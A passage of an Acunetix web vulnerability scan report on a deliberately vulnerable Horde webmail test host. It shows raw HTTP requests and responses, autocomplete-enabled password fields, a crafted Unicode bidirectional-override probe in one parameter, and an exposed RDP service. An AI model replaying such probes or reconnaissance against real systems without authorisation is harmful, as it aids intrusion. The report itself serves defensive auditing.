GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
Acunetix Website Audit77
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (fa2cb8a65862e58974030595118192cb)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10190
/imp/redirect.php
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/redirect.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit78
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
/imp/test.php
Details
Password type input named passwd from form named form1 with action test.php has autocomplete enabled.
Request
GET /imp/test.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 16:36:45 GMT
Content-Length: 4560
Windows Terminal Services server running
 
SeverityInformational
TypeConfiguration
Reported by moduleScripting (windows_terminal_services.script)
Description
A Windows Terminal Services server is running on this host. Terminal Services is one of the components of Microsoft Windows (both server and client versions) that allows a user to access applications and data on a remote computer. Microsoft's RDP implementation of Terminal Services doesn't verify the server's identity when setting up the encryption keys for the RDP session. This vulnerability can result in a potential man-in-the-middle (MITM) attack.
Impact
Possible information disclosure.
Recommendation
It's recommended to restrict access to valid users and/or hosts.
Affected items
Server
Details
The Windows Terminal Services server is running on TCP port 3389.
Acunetix Website Audit79